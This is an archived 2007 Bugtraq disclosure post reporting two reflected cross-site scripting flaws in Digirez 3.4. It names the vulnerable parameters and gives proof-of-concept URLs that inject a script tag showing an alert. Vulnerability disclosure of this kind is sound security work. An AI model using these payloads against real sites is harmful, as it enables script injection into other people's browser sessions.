Multiple XSS in Digirez

---

• From: xx_hack_xx_2004@xxxxxxxxxxx
• Date: 25 May 2007 10:03:24 -0000

---

Hello
Vulnerable : Digirez
Version: 3.4
web : http://www.digiappz.com


XSS :
1-
http://www.example.com/room/info_book.asp?Room_name=[XSS]
2-
http://www.example.com/room/week.asp?curYear=[XSS]

For Example u can put :
1-
http://www.example.com/room/info_book.asp?Room_name='><script>alert(1);</script>
2-
http://www.example.com/room/week.asp?curYear='><script>alert(1);</script>

Discovered By Linux_Drox
www.LeZr.Com

Best regards ,,

---

• Prev by Date: rPSA-2007-0109-1 file
• Next by Date: Pligg critical vulnerability
• Previous by thread: rPSA-2007-0109-1 file
• Next by thread: Pligg critical vulnerability
• Index(es):
  • Date
  • Thread

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2007-05